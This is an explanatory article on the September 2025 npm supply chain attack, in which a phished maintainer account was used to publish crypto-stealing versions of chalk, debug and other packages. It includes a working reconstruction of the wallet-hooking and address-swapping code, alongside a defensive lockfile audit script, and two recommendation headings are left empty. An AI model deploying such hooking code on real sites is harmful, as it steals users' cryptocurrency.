Inside the Largest JavaScript Supply Chain Attack in History

September 8, 2025 marked a watershed moment in software supply chain security when attackers compromised 18 critical npm packages with over 2 billion weekly downloads through a single phishing email.

The Attack That Shook JavaScript’s Foundation

On the morning of September 8, 2025, the JavaScript ecosystem experienced what security researchers are calling the largest npm supply chain attack ever recorded, measured by the download volume of the affected packages. What began as a routine Monday morning for open source maintainer Josh Junon (known as “qix”) ended with a phishing campaign that compromised 18 of the most fundamental packages in modern web development.

The attack affected packages with a collective 2 billion weekly downloads on the npm Registry, including foundational libraries like chalk, debug, ansi-styles, and strip-ansi that are deeply embedded in countless JavaScript applications worldwide.

How a Single Email Compromised JavaScript’s Infrastructure

The Phishing Campaign

The attack began when Junon received what appeared to be a legitimate security notification from an address at “npmjs.help”, a look-alike domain registered only days earlier (September 4, 2025) to impersonate npm’s official support channels.

The phishing email warned that Junon’s two-factor authentication credentials needed immediate updating before September 10, 2025, or his account would be locked. The message employed classic social engineering tactics: urgency, authority, and fear.

“Sorry everyone, I should have paid more attention,” Junon later acknowledged on Bluesky. “Not like me; have had a stressful week. Will work to get this cleaned up.”

The Technical Exploitation

The malicious link directed victims to a fake npm login page served from attacker-controlled BunnyCDN buckets. The credential stealer captured usernames, passwords, and live TOTP codes and forwarded them to websocket-api2.publicvm.com, which let the attackers log in within the short validity window of a TOTP code. This is the standard weakness of code-based 2FA against a real-time phishing relay: a one-time code proves nothing about which site the user typed it into, whereas phishing-resistant factors such as WebAuthn security keys or passkeys are bound to the legitimate origin and cannot be relayed this way.

The attack was particularly effective because Junon read the phishing email on his phone, where the difference between “npmjs.help” and “npmjs.com” is easy to overlook on a small screen.

Inside the Malware: A Cryptocurrency Hunter

Sophisticated Obfuscation

Once the attackers gained control of Junon’s account, they immediately began publishing malicious versions of the packages he maintained. The injected payload was heavily obfuscated, using the hexadecimal _0x-prefixed identifiers typical of common JavaScript obfuscators and hundreds of encoded strings that were only decoded at runtime.

Security researchers quickly identified that the malicious code was designed to run in browser environments, not in server-side Node.js: it did nothing useful on a build server or API host that merely installed the packages, but any web application whose front-end bundle pulled in a compromised version shipped the payload to that application’s users.

The Crypto-Stealing Mechanism

The malware’s primary function was cryptocurrency theft through address substitution. It watched for window.ethereum to detect injected wallet providers such as MetaMask, then hooked the provider’s request, send, and sendAsync methods so that transaction parameters could be altered before the wallet showed them to the user for approval.

The substitution worked on three fronts:

Address Replacement: For each cryptocurrency address it found, the malware chose the “closest” attacker-controlled address by Levenshtein distance, so the substituted address resembled the original and the swap was less likely to be noticed by a user glancing at it.

Network Interception: The code hooked both fetch() and XMLHttpRequest to rewrite network responses on the fly, modifying JSON and text payloads before the application could process them, so even an address the application displayed from an API response could already be the attacker’s.

Multi-Chain Support: The malware targeted multiple cryptocurrency networks including Ethereum, Bitcoin, Solana, TRON, Litecoin, and Bitcoin Cash.
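The three layers above fit in a few dozen lines, which is what makes the design worth studying. The following is an added example written for this article, not the malware’s own code: it reconstructs the Levenshtein-based address selection and the payload rewriting against constructed data, applies them to a simulated wallet provider and a simulated fetch, and ends with the check a defender can run for wrapped globals. The address patterns, the attacker address pool, the simulated provider and the API response are all constructed for the example, and only two of the six chains are covered.

```javascript
'use strict';

// Levenshtein edit distance, single-row dynamic programming.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Pick the attacker address that needs the fewest edits to turn into the victim's,
// so the swap survives a quick glance at the address.
function closestAddress(victim, pool) {
  let best = pool[0];
  let bestDistance = Infinity;
  for (const candidate of pool) {
    const d = levenshtein(victim.toLowerCase(), candidate.toLowerCase());
    if (d < bestDistance) {
      best = candidate;
      bestDistance = d;
    }
  }
  return best;
}

// Constructed, simplified patterns for two of the six chains the article names
// (Solana's base58 form overlaps the others and is omitted for clarity).
const ADDRESS_PATTERNS = {
  ethereum: /0x[0-9a-fA-F]{40}/g,
  bitcoin: /\b(?:bc1[02-9ac-hj-np-z]{11,71}|[13][1-9A-HJ-NP-Za-km-z]{25,34})\b/g,
};

// Constructed placeholder "attacker" addresses; not real indicators of compromise.
const ATTACKER_POOL = {
  ethereum: ['0x' + '1'.repeat(40), '0xAbCdEf' + '0'.repeat(33) + '1'],
  bitcoin: ['bc1q' + 'x'.repeat(38)],
};

// Replace every address in a text or JSON body with the closest attacker address.
function rewriteAddresses(text, pool = ATTACKER_POOL) {
  let out = text;
  for (const [chain, pattern] of Object.entries(ADDRESS_PATTERNS)) {
    const candidates = pool[chain];
    if (!candidates || candidates.length === 0) continue;
    out = out.replace(pattern, (addr) => closestAddress(addr, candidates));
  }
  return out;
}

// Hook a wallet provider's request() so the `to` address of a transaction is swapped
// before the wallet displays it. `provider` stands in for window.ethereum; the real
// payload hooked request, send and sendAsync the same way.
function hookProvider(provider, pool = ATTACKER_POOL) {
  const originalRequest = provider.request.bind(provider);
  provider.request = (args) => originalRequest(JSON.parse(rewriteAddresses(JSON.stringify(args), pool)));
  return provider;
}

// Hook a fetch-like function so JSON/text responses are rewritten before the app parses them.
function hookFetch(fetchImpl, pool = ATTACKER_POOL) {
  return async function hookedFetch(...args) {
    const response = await fetchImpl(...args);
    const body = rewriteAddresses(await response.text(), pool);
    return { status: response.status, text: async () => body, json: async () => JSON.parse(body) };
  };
}

// Defender's check: a page script that wraps fetch or XMLHttpRequest.prototype.send
// leaves behind a function whose source is no longer "[native code]". It does not
// apply to ethereum.request, which the wallet extension itself implements in JavaScript.
function isNativeFunction(fn) {
  return typeof fn === 'function' && /\{\s*\[native code\]\s*\}/.test(Function.prototype.toString.call(fn));
}

async function demo() {
  const victim = '0x' + '1'.repeat(37) + 'abc'; // constructed user address
  // Constructed API response carrying a deposit address, as a dapp might fetch it.
  const simulatedFetch = async () => ({ status: 200, text: async () => JSON.stringify({ depositAddress: victim }) });
  const fetch = hookFetch(simulatedFetch);
  console.log('rewritten response:', await (await fetch('https://api.example/deposit')).json());

  const wallet = hookProvider({ request: async (args) => args }); // simulated provider echoes its input
  const tx = { method: 'eth_sendTransaction', params: [{ to: victim, value: '0x1' }] };
  console.log('rewritten transaction:', JSON.stringify(await wallet.request(tx)));

  console.log('hooked fetch native?', isNativeFunction(fetch), '| Array.prototype.map native?', isNativeFunction(Array.prototype.map));
}

demo();
```

The point of the Levenshtein step is visible in the demo output: the user’s address and the substituted one share a long identical prefix, so anyone who checks only the first and last few characters can still be fooled. The native-code check is cheap to run from a page’s own integrity script, but it only covers browser built-ins; a wrapped wallet provider has to be caught by the wallet’s own confirmation screen, which is exactly why the malware rewrote the parameters before that screen was drawn.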

The Affected Packages: JavaScript’s Critical Infrastructure

The compromised packages represent some of the most fundamental utilities in the JavaScript ecosystem:

Core packages included: ansi-styles (371M weekly downloads), debug (358M), chalk (300M), supports-color (287M), strip-ansi (261M), ansi-regex (244M), wrap-ansi (198M), and color-convert (194M), along with ten smaller utilities.

Aikido Security, which first detected the attack, noted that these aren’t obscure utilities – they’re transitive dependencies buried deep in the dependency trees of frameworks and CLI tools used by millions of developers.

Timeline: From Compromise to Containment

13:16 UTC: Malicious versions first published to npm
~15:20 UTC: Community identifies suspicious code and raises alerts on GitHub
Within 2 hours: Maintainers revert to clean versions and unpublish compromised releases
After discovery: npm flags and locks impacted accounts while developers begin auditing dependencies.

According to Vercel’s incident response, the company quickly identified 70 teams with builds containing compromised package versions across 76 unique projects.

The Response: Community Mobilization

Rapid Detection and Warning

The cybersecurity community’s response was swift and coordinated. Aikido Security was among the first to flag the suspicious activity, while Charles Guillemet from Ledger issued early warnings on social media.

Industry Impact Assessment

Major platforms quickly assessed their exposure; Vercel’s count of 70 teams and 76 projects, noted above, was among the first published.

The Surprisingly Small Heist

Despite the massive scale and potential for catastrophic damage, the attackers managed to steal only approximately $50 to $66 worth of cryptocurrency before the attack was contained.

As security researcher Nicholas Weaver noted, this represents a “missed opportunity” for the attackers, who could have installed backdoors or exfiltrated secrets instead of focusing narrowly on crypto transactions.

The Security Alliance quipped that “the biggest financial impact of this entire incident will be the collective thousands of hours spent by engineering and security teams around the world working to clean compromised environments, and the millions of dollars of sales contracts that will inevitably be signed as a result of this new case study.”

Lessons Learned and Prevention Strategies

The Human Factor

Ensar Seker from SOCRadar noted that this incident “represents a watershed moment in software supply chain security,” highlighting how attackers used a domain that convincingly mimicked a legitimate one to socially engineer the maintainer through “calculated, timed” execution that exploited “developer psychology.”

Technical Safeguards

Security experts recommend several preventive measures:

For Maintainers:

For Organizations:
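As an added example of the organisational check, and not code from npm or from any of the researchers cited here: the script below walks a package-lock.json, in both the nested v1 layout and the flat v2/v3 packages map, and reports every occurrence of a denylisted package@version, including copies nested under other dependencies, which is where these transitive utilities usually hide. The sample lockfile is constructed; the denylist entries are the malicious versions publicly reported for this incident and must be verified against npm’s advisory before use.

```javascript
'use strict';

// Package@version pairs to hunt for. These are the malicious versions publicly reported
// for the September 8 incident, included here as illustrative entries: verify them
// against npm's advisory and extend the map with the remaining affected packages.
const DENYLIST = {
  chalk: new Set(['5.6.1']),
  debug: new Set(['4.4.2']),
  'ansi-styles': new Set(['6.2.2']),
  'strip-ansi': new Set(['7.1.1']),
  'supports-color': new Set(['10.2.1']),
};

// Package name from a lockfile v2/v3 key such as "node_modules/a/node_modules/@scope/b".
function nameFromPath(key) {
  const marker = 'node_modules/';
  const idx = key.lastIndexOf(marker);
  return idx === -1 ? key : key.slice(idx + marker.length);
}

// Walk a parsed package-lock.json and return every denylisted package@version with
// its position in the tree. Handles the flat "packages" map of lockfile v2/v3 and the
// nested "dependencies" tree of v1 (v2 carries both; the flat map is authoritative).
function auditLockfile(lock, denylist = DENYLIST) {
  const hits = [];
  const check = (name, version, where) => {
    if (denylist[name] && denylist[name].has(version)) hits.push({ name, version, where });
  };
  if (lock.packages) {
    for (const [key, entry] of Object.entries(lock.packages)) {
      if (key === '' || !entry.version) continue; // root project entry or workspace link
      check(nameFromPath(key), entry.version, key);
    }
  } else if (lock.dependencies) {
    const walk = (deps, prefix) => {
      for (const [name, entry] of Object.entries(deps)) {
        const where = `${prefix}node_modules/${name}`;
        check(name, entry.version, where);
        if (entry.dependencies) walk(entry.dependencies, `${where}/`);
      }
    };
    walk(lock.dependencies, '');
  }
  return hits;
}

function printHits(hits) {
  if (hits.length === 0) {
    console.log('no denylisted package versions found');
    return;
  }
  for (const h of hits) console.log(`FOUND ${h.name}@${h.version} at ${h.where}`);
}

// Constructed lockfile: a direct dependency on a bad chalk, a bad debug nested under a
// CLI tool (the transitive case), a clean supports-color, and a workspace link.
const SAMPLE_LOCK = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', dependencies: { chalk: '^5.6.0', 'some-cli': '^1.0.0' } },
    'node_modules/chalk': { version: '5.6.1' },
    'node_modules/some-cli': { version: '1.0.0', dependencies: { debug: '^4.4.0' } },
    'node_modules/some-cli/node_modules/debug': { version: '4.4.2' },
    'node_modules/supports-color': { version: '9.4.0' },
    'node_modules/my-workspace': { resolved: 'packages/my-workspace', link: true },
  },
};

const target = process.argv[2];
if (target && target.endsWith('package-lock.json')) {
  const hits = auditLockfile(JSON.parse(require('fs').readFileSync(target, 'utf8')));
  printHits(hits);
  process.exitCode = hits.length ? 1 : 0; // non-zero so a CI job fails the build
} else {
  printHits(auditLockfile(SAMPLE_LOCK)); // no path given: demonstrate on the constructed lockfile
}
```

Run it as `node audit-lock.js path/to/package-lock.json` from CI so a hit fails the build. A lockfile scan is only half the check: `npm ls <package>` shows what is actually installed in a working tree, and a compromised tarball can still sit in the local npm cache until `npm cache clean --force` is run.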

The Broader Supply Chain Security Context

According to ReversingLabs’ 2025 Software Supply Chain Security Report, 14 of the 23 crypto-related malicious campaigns in 2024 targeted npm, with the remainder linked to PyPI. This attack continues a troubling trend of supply chain compromises targeting the JavaScript ecosystem.

Sonatype’s analysis emphasized that “open source developers are the new frontline of cyberattacks,” with attackers increasingly targeting maintainers as high-value assets who can provide access to millions of downstream users.

Looking Forward: Strengthening the Ecosystem

The September 8th incident serves as a stark reminder of the interconnected nature of modern software development. As one analysis noted: “The path forward requires not just better technology but better processes, stronger community standards, and a recognition that in the modern software ecosystem, security is not a feature but a fundamental requirement.”

The JavaScript community’s rapid response – from detection to remediation within hours – demonstrates the strength of open source collaboration. However, it also highlights the fragility of systems that depend on individual maintainers for critical infrastructure.

As we move forward, the industry must balance the benefits of open source development with the security realities of an increasingly hostile threat landscape. The great npm heist of 2025 may have stolen only $50, but it revealed vulnerabilities worth billions.


For the latest security advisories and indicators of compromise related to this incident, developers should monitor npm’s security announcements and security research from organizations like Socket, Sonatype, and Aikido Security.